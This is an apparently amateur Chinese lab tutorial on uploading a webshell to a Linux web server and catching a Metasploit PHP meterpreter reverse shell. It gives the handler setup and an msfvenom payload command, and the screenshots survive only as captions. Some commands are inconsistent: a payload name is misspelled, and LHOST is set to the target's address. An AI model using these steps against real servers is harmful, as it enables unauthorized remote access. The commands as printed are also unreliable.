msf实现linux shell反弹

华盟原创文章投稿奖励计划

运行环境:

kali       ip:192.168.123.90
Linux    ip:192.168.123.5

Linux服务器上开有80端口,并且有上传漏洞,具体如何绕过就不多讲,主要讲的是msf生成木马反弹linux shell。

话不多说,上传一句话,菜刀连接。

msf实现linux shell反弹

然后打开kali 并启动msf

进入 >   use exploit/multi/handler
设置 payload>   set payload php/metrpreter/reverse_tcp

msf实现linux shell反弹

设置IP  > set lhost 192.168.123.90

msf实现linux shell反弹

查看一下参数>show options

msf实现linux shell反弹

没啥问题开始监听>run

msf实现linux shell反弹

再在终端上生产msf木马

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.123.5 LPORT=4444  -f raw > msf.php

然后将产生的木马用小马上传上去,并且在浏览器上访问

msf实现linux shell反弹

我们再看msf发现已经有会话反弹过来了,我们接下来看一下

msf实现linux shell反弹

然后我们查看并进入会话查看信息

msf实现linux shell反弹

进入shell

msf实现linux shell反弹

上面已经进入shell 并且执行的ls命令,下面让我们看下权限

msf实现linux shell反弹

是www权限,然后接下来开始提权,皮一下,提权手法见下一期分享。

本人也是小菜,望大佬勿喷。
有错的地方及时联系本人,本人会及时修改,谢谢大家关看,及时交流。

本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/241229.html

发表评论